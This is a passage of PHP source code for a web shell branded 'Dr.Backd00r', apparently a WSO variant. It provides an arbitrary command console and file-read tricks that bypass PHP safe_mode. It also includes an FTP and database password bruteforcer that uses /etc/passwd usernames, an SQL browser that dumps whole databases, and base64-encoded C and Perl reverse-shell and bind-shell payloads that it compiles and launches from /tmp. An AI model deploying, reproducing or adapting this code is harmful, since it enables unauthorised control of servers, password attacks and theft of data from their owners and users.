 899     echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form><br><br><span>Imap_open (read file)</span><form onsubmit=\'g(null,null,"6",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form>'; 
 900     if($temp) 
 901         echo '<pre class="ml1" style="margin-top:5px" id="Output">'.$temp.'</pre>'; 
 902     echo '</div>'; 
 903     printFooter(); 
 904 } 
 905 
 906 function actionConsole() { 
 907     if(isset($_POST['ajax'])) { 
 908         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 909         ob_start(); 
 910         echo "document.cf.cmd.value='';\n"; 
 911         $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\\'&#92;&#48;")); 
 912         if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match))    { 
 913             if(@chdir($match[1])) { 
 914                 $GLOBALS['cwd'] = @getcwd(); 
 915                 echo "document.mf.c.value='".$GLOBALS['cwd']."';"; 
 916             } 
 917         } 
 918         echo "document.cf.output.value+='".$temp."';"; 
 919         echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;"; 
 920         $temp = ob_get_clean(); 
 921         echo strlen($temp), "\n", $temp; 
 922         exit; 
 923     } 
 924     printHeader(); 
 925 ?> 
 926 <script> 
 927 if(window.Event) window.captureEvents(Event.KEYDOWN); 
 928 var cmds = new Array(""); 
 929 var cur = 0; 
 930 function kp(e) { 
 931     var n = (window.Event) ? e.which : e.keyCode; 
 932     if(n == 38) { 
 933         cur--; 
 934         if(cur>=0) 
 935             document.cf.cmd.value = cmds[cur]; 
 936         else 
 937             cur++; 
 938     } else if(n == 40) { 
 939         cur++; 
 940         if(cur < cmds.length) 
 941             document.cf.cmd.value = cmds[cur]; 
 942         else 
 943             cur--; 
 944     } 
 945 } 
 946 function add(cmd) { 
 947     cmds.pop(); 
 948     cmds.push(cmd); 
 949     cmds.push(""); 
 950     cur = cmds.length-1; 
 951 } 
 952 </script> 
 953 <?php 
 954     echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\'clear\'){document.cf.output.value=\'\';document.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value);}else{g(null,null,this.cmd.value);} return false;"><select name=alias>'; 
 955     foreach($GLOBALS['aliases'] as $n => $v) { 
 956         if($v == '') { 
 957             echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; 
 958             continue; 
 959         } 
 960         echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; 
 961     } 
 962     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 963         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 964     echo '</select><input type=button onclick="add(document.cf.alias.value);if(document.cf.ajax.checked){a(null,null,document.cf.alias.value);}else{g(null,null,document.cf.alias.value);}" value=">>"> <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; 
 965     if(!empty($_POST['p1'])) { 
 966         echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1'])); 
 967     } 
 968     echo '</textarea><input type=text name=cmd style="border-top:0;width:100%;margin:0;" onkeydown="kp(event);">'; 
 969     echo '</form></div><script>document.cf.cmd.focus();</script>'; 
 970     printFooter(); 
 971 } 
 972 
 973 function actionLogout() { 
 974     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]); 
 975     echo 'bye!'; 
 976 } 
 977 
 978 function actionSelfRemove() { 
 979     printHeader(); 
 980     if($_POST['p1'] == 'yes') { 
 981         if(@unlink(SELF_PATH)) 
 982             die('Shell has been removed'); 
 983         else 
 984             echo 'unlink error!'; 
 985     } 
 986     echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; 
 987     printFooter(); 
 988 } 
 989 
 990 function actionBruteforce() { 
 991     printHeader(); 
 992     if( isset($_POST['proto']) ) { 
 993         echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; 
 994         if( $_POST['proto'] == 'ftp' ) { 
 995             function bruteForce($ip,$port,$login,$pass) { 
 996                 $fp = @ftp_connect($ip, $port?$port:21); 
 997                 if(!$fp) return false; 
 998                 $res = @ftp_login($fp, $login, $pass); 
 999                 @ftp_close($fp); 
1000                 return $res; 
1001             } 
1002         } elseif( $_POST['proto'] == 'mysql' ) { 
1003             function bruteForce($ip,$port,$login,$pass) { 
1004                 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); 
1005                 @mysql_close($res); 
1006                 return $res; 
1007             } 
1008         } elseif( $_POST['proto'] == 'pgsql' ) { 
1009             function bruteForce($ip,$port,$login,$pass) { 
1010                 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=''"; 
1011                 $res = @pg_connect($server[0].':'.$server[1]?$server[1]:5432, $login, $pass); 
1012                 @pg_close($res); 
1013                 return $res; 
1014             } 
1015         } 
1016         $success = 0; 
1017         $attempts = 0; 
1018         $server = explode(":", $_POST['server']); 
1019         if($_POST['type'] == 1) { 
1020             $temp = @file('/etc/passwd'); 
1021             if( is_array($temp) ) 
1022                 foreach($temp as $line) { 
1023                     $line = explode(":", $line); 
1024                     ++$attempts; 
1025                     if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { 
1026                         $success++; 
1027                         echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; 
1028                     } 
1029                     if(@$_POST['reverse']) { 
1030                         $tmp = ""; 
1031                         for($i=strlen($line[0])-1; $i>=0; --$i) 
1032                             $tmp .= $line[0][$i]; 
1033                         ++$attempts; 
1034                         if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { 
1035                             $success++; 
1036                             echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); 
1037                         } 
1038                     } 
1039                 } 
1040         } elseif($_POST['type'] == 2) { 
1041             $temp = @file($_POST['dict']); 
1042             if( is_array($temp) ) 
1043                 foreach($temp as $line) { 
1044                     $line = trim($line); 
1045                     ++$attempts; 
1046                     if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) { 
1047                         $success++; 
1048                         echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; 
1049                     } 
1050                 } 
1051         } 
1052         echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; 
1053     } 
1054     echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' 
1055         .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' 
1056         .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' 
1057         .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' 
1058         .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' 
1059         .'<span>Server:port</span></td>' 
1060         .'<td><input type=text name=server value="127.0.0.1"></td></tr>' 
1061         .'<tr><td><span>Brute type</span></td>' 
1062         .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' 
1063         .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' 
1064         .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' 
1065         .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' 
1066         .'<td><input type=text name=login value="komsen"></td></tr>' 
1067         .'<tr><td><span>Dictionary</span></td>' 
1068         .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' 
1069         .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; 
1070     echo '</div><br>'; 
1071     printFooter(); 
1072 } 
1073 
1074 function actionSql() { 
1075     class DbClass { 
1076         var $type; 
1077         var $link; 
1078         var $res; 
1079         function DbClass($type)    { 
1080             $this->type = $type; 
1081         } 
1082         function connect($host, $user, $pass, $dbname){ 
1083             switch($this->type)    { 
1084                 case 'mysql': 
1085                     if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; 
1086                     break; 
1087                 case 'pgsql': 
1088                     $host = explode(':', $host); 
1089                     if(!$host[1]) $host[1]=5432; 
1090                     if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; 
1091                     break; 
1092             } 
1093             return false; 
1094         } 
1095         function selectdb($db) { 
1096             switch($this->type)    { 
1097                 case 'mysql': 
1098                     if (@mysql_select_db($db))return true; 
1099                     break; 
1100             } 
1101             return false; 
1102         } 
1103         function query($str) { 
1104             switch($this->type) { 
1105                 case 'mysql': 
1106                     return $this->res = @mysql_query($str); 
1107                     break; 
1108                 case 'pgsql': 
1109                     return $this->res = @pg_query($this->link,$str); 
1110                     break; 
1111             } 
1112             return false; 
1113         } 
1114         function fetch() { 
1115             $res = func_num_args()?func_get_arg(0):$this->res; 
1116             switch($this->type)    { 
1117                 case 'mysql': 
1118                     return @mysql_fetch_assoc($res); 
1119                     break; 
1120                 case 'pgsql': 
1121                     return @pg_fetch_assoc($res); 
1122                     break; 
1123             } 
1124             return false; 
1125         } 
1126         function listDbs() { 
1127             switch($this->type)    { 
1128                 case 'mysql': 
1129                     return $this->res = @mysql_list_dbs($this->link); 
1130                 break; 
1131                 case 'pgsql': 
1132                     return $this->res = $this->query("SELECT datname FROM pg_database"); 
1133                 break; 
1134             } 
1135             return false; 
1136         } 
1137         function listTables() { 
1138             switch($this->type)    { 
1139                 case 'mysql': 
1140                     return $this->res = $this->query('SHOW TABLES'); 
1141                 break; 
1142                 case 'pgsql': 
1143                     return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'"); 
1144                 break; 
1145             } 
1146             return false; 
1147         } 
1148         function error() { 
1149             switch($this->type)    { 
1150                 case 'mysql': 
1151                     return @mysql_error($this->link); 
1152                 break; 
1153                 case 'pgsql': 
1154                     return @pg_last_error($this->link); 
1155                 break; 
1156             } 
1157             return false; 
1158         } 
1159         function setCharset($str) { 
1160             switch($this->type)    { 
1161                 case 'mysql': 
1162                     if(function_exists('mysql_set_charset')) 
1163                         return @mysql_set_charset($str, $this->link); 
1164                     else 
1165                         $this->query('SET CHARSET '.$str); 
1166                     break; 
1167                 case 'mysql': 
1168                     return @pg_set_client_encoding($this->link, $str); 
1169                     break; 
1170             } 
1171             return false; 
1172         } 
1173         function dump($table) { 
1174             switch($this->type)    { 
1175                 case 'mysql': 
1176                     $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); 
1177                     $create = mysql_fetch_array($res); 
1178                     echo $create[1].";\n\n"; 
1179                     $this->query('SELECT * FROM `'.$table.'`'); 
1180                     while($item = $this->fetch()) { 
1181                         $columns = array(); 
1182                         foreach($item as $k=>$v) { 
1183                             $item[$k] = "'".@mysql_real_escape_string($v)."'"; 
1184                             $columns[] = "`".$k."`"; 
1185                         } 
1186                     echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
1187                     } 
1188                 break; 
1189                 case 'pgsql': 
1190                     $this->query('SELECT * FROM '.$table); 
1191                     while($item = $this->fetch()) { 
1192                         $columns = array(); 
1193                         foreach($item as $k=>$v) { 
1194                             $item[$k] = "'".addslashes($v)."'"; 
1195                             $columns[] = $k; 
1196                         } 
1197                     echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; 
1198                     } 
1199                 break; 
1200             } 
1201             return false; 
1202         } 
1203     }; 
1204     $db = new DbClass($_POST['type']); 
1205     if(@$_POST['p2']=='download') { 
1206         ob_start("ob_gzhandler", 4096); 
1207         $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); 
1208         $db->selectdb($_POST['sql_base']); 
1209         header("Content-Disposition: attachment; filename=dump.sql"); 
1210         header("Content-Type: text/plain"); 
1211         foreach($_POST['tbl'] as $v) 
1212                 $db->dump($v); 
1213         exit; 
1214     } 
1215     printHeader(); 
1216     ?> 
1217     <h1>Sql browser</h1><div class=content> 
1218     <form name="sf" method="post"> 
1219         <table cellpadding="2" cellspacing="0"> 
1220             <tr> 
1221                 <td>Type</td> 
1222                 <td>Host</td> 
1223                 <td>Login</td> 
1224                 <td>Password</td> 
1225                 <td>Database</td> 
1226                 <td></td> 
1227             </tr> 
1228             <tr> 
1229                 <input type=hidden name=a value=Sql> 
1230                 <input type=hidden name=p1 value='query'> 
1231                 <input type=hidden name=p2> 
1232                 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd']);?>'> 
1233                 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
1234                 <td> 
1235                     <select name='type'> 
1236                         <option value="mysql" <?php if(@$_POST['type']=='mysql')echo 'selected';?>>MySql</option> 
1237                         <option value="pgsql" <?php if(@$_POST['type']=='pgsql')echo 'selected';?>>PostgreSql</option> 
1238                     </select></td> 
1239                 <td><input type=text name=sql_host value='<?=(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host']));?>'></td> 
1240                 <td><input type=text name=sql_login value='<?=(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login']));?>'></td> 
1241                 <td><input type=text name=sql_pass value='<?=(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass']));?>'></td> 
1242                 <td> 
1243     <?php 
1244     $tmp = "<input type=text name=sql_base value=''>"; 
1245     if(isset($_POST['sql_host'])){ 
1246         if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { 
1247             switch($_POST['charset']) { 
1248                 case "Windows-1251": $db->setCharset('cp1251'); break; 
1249                 case "UTF-8": $db->setCharset('utf8'); break; 
1250                 case "KOI8-R": $db->setCharset('koi8r'); break; 
1251                 case "KOI8-U": $db->setCharset('koi8u'); break; 
1252                 case "cp866": $db->setCharset('cp866'); break; 
1253             } 
1254             $db->listDbs(); 
1255             echo "<select name=sql_base><option value=''></option>"; 
1256             while($item = $db->fetch()) { 
1257                 list($key, $value) = each($item); 
1258                 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; 
1259             } 
1260             echo '</select>'; 
1261         } 
1262         else echo $tmp; 
1263     }else 
1264         echo $tmp; 
1265     ?></td> 
1266                 <td><input type=submit value=">>"></td> 
1267             </tr> 
1268         </table> 
1269         <script> 
1270             function st(t,l) { 
1271                 document.sf.p1.value = 'select'; 
1272                 document.sf.p2.value = t; 
1273                 if(l!=null)document.sf.p3.value = l; 
1274                 document.sf.submit(); 
1275             } 
1276             function is() { 
1277                 for(i=0;i<document.sf.elements['tbl[]'].length;++i) 
1278                     document.sf.elements['tbl[]'][i].checked = !document.sf.elements['tbl[]'][i].checked; 
1279             } 
1280         </script> 
1281     <?php 
1282     if(isset($db) && $db->link){ 
1283         echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; 
1284             if(!empty($_POST['sql_base'])){ 
1285                 $db->selectdb($_POST['sql_base']); 
1286                 echo "<tr><td width=1 style='border-top:2px solid #666;border-right:2px solid #666;'><span>Tables:</span><br><br>"; 
1287                 $tbls_res = $db->listTables(); 
1288                 while($item = $db->fetch($tbls_res)) { 
1289                     list($key, $value) = each($item); 
1290                     $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); 
1291                     $value = htmlspecialchars($value); 
1292                     echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."')\">".$value."</a> (".$n['n'].")</nobr><br>";
1293                 } 
1294                 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'></td><td style='border-top:2px solid #666;'>"; 
1295                 if(@$_POST['p1'] == 'select') { 
1296                     $_POST['p1'] = 'query'; 
1297                     $db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].''); 
1298                     $num = $db->fetch(); 
1299                     $num = $num['n']; 
1300                     echo "<span>".$_POST['p2']."</span> ($num) "; 
1301                     for($i=0;$i<($num/30);$i++) 
1302                         if($i != (int)$_POST['p3']) 
1303                             echo "<a href='#' onclick='st(\"".$_POST['p2']."\", $i)'>",($i+1),"</a> "; 
1304                         else 
1305                             echo ($i+1)," "; 
1306                     if($_POST['type']=='pgsql') 
1307                         $_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); 
1308                     else 
1309                         $_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; 
1310                     echo "<br><br>"; 
1311                 } 
1312                 if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) { 
1313                     $db->query(@$_POST['p3']); 
1314                     if($db->res !== false) { 
1315                         $title = false; 
1316                         echo '<table width=100% cellspacing=0 cellpadding=2 class=main>'; 
1317                         $line = 1; 
1318                         while($item = $db->fetch())    { 
1319                             if(!$title)    { 
1320                                 echo '<tr>'; 
1321                                 foreach($item as $key => $value) 
1322                                     echo '<th>'.$key.'</th>'; 
1323                                 reset($item); 
1324                                 $title=true; 
1325                                 echo '</tr><tr>'; 
1326                                 $line = 2; 
1327                             } 
1328                             echo '<tr class="l'.$line.'">'; 
1329                             $line = $line==1?2:1; 
1330                             foreach($item as $key => $value) { 
1331                                 if($value == null) 
1332                                     echo '<td><i>null</i></td>'; 
1333                                 else 
1334                                     echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; 
1335                             } 
1336                             echo '</tr>'; 
1337                         } 
1338                         echo '</table>'; 
1339                     } else { 
1340                         echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; 
1341                     } 
1342                 } 
1343                 echo "<br><textarea name='p3' style='width:100%;height:100px'>".@htmlspecialchars($_POST['p3'])."</textarea><br/><input type=submit value='Execute'>"; 
1344                 echo "</td></tr>"; 
1345             } 
1346             echo "</table></form><br/><form onsubmit='document.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input  class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; 
1347             if(@$_POST['p1'] == 'loadfile') { 
1348                 $db->query("SELECT LOAD_FILE('".addslashes($_POST['p2'])."') as file"); 
1349                 $file = $db->fetch(); 
1350                 echo '<pre class=ml1>'.htmlspecialchars($file['file']).'</pre>';
1351             } 
1352     } 
1353     echo '</div>'; 
1354     printFooter(); 
1355 } 
1356 function actionNetwork() { 
1357     printHeader(); 
1358     $back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; 
1359     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 
1360     $bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; 
1361     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; 
1362     ?> 
1363     <h1>Network tools</h1><div class=content> 
1364     <form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;"> 
1365     <span>Bind port to /bin/sh</span><br/> 
1366     Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>"> 
1367     </form> 
1368     <form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;"> 
1369     <span>Back-connect to</span><br/> 
1370     Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>"> 
1371     </form><br> 
1372     <?php 
1373     if(isset($_POST['p1'])) { 
1374         function cf($f,$t) { 
1375             $w=@fopen($f,"w") or @function_exists('file_put_contents'); 
1376             if($w)    { 
1377                 @fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t)); 
1378                 @fclose($w); 
1379             } 
1380         } 
1381         if($_POST['p1'] == 'bpc') { 
1382             cf("/tmp/bp.c",$bind_port_c); 
1383             $out = ex("gcc -o /tmp/bp /tmp/bp.c"); 
1384             @unlink("/tmp/bp.c"); 
1385             $out .= ex("/tmp/bp ".$_POST['p2']." ".$_POST['p3']." &"); 
1386             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp")."</pre>"; 
1387         } 
1388         if($_POST['p1'] == 'bpp') { 
1389             cf("/tmp/bp.pl",$bind_port_p); 
1390             $out = ex(which("perl")." /tmp/bp.pl ".$_POST['p2']." &"); 
1391             echo "<pre class=ml1>$out\n".ex("ps aux | grep bp.pl")."</pre>"; 
1392         } 
1393         if($_POST['p1'] == 'bcc') { 
1394             cf("/tmp/bc.c",$back_connect_c); 
1395             $out = ex("gcc -o /tmp/bc /tmp/bc.c"); 
1396             @unlink("/tmp/bc.c"); 
1397             $out .= ex("/tmp/bc ".$_POST['p2']." ".$_POST['p3']." &"); 
1398             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc")."</pre>"; 
1399         } 
1400         if($_POST['p1'] == 'bcp') { 
1401             cf("/tmp/bc.pl",$back_connect_p); 
1402             $out = ex(which("perl")." /tmp/bc.pl ".$_POST['p2']." ".$_POST['p3']." &"); 
1403             echo "<pre class=ml1>$out\n".ex("ps aux | grep bc.pl")."</pre>"; 
1404         } 
1405     } 
1406     echo '</div>'; 
1407     printFooter(); 
1408 } 
1409 if( empty($_POST['a']) ) 
1410     if(isset($default_action) && function_exists('action' . $default_action)) 
1411         $_POST['a'] = $default_action; 
1412     else 
1413         $_POST['a'] = 'SecInfo'; 
1414 if( !empty($_POST['a']) && function_exists('action' . $_POST['a']) ) 
1415     call_user_func('action' . $_POST['a']); 
1416 ?> 
1417 <div id="cot_tl_fixed"><marquee>Shell - *Dr.Backd00r*  - SubhashDasyam.com</marquee></div> 
1418  </marquee></div>